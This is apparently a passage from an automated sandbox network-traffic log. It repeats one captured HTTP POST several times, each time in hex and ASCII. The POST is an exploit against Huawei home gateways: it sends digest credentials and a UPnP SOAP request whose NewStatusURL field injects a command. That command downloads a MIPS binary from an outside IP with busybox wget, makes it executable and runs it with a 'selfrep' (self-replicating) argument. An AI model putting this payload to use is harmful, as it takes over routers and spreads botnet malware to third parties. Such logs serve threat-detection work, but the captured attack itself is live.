xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
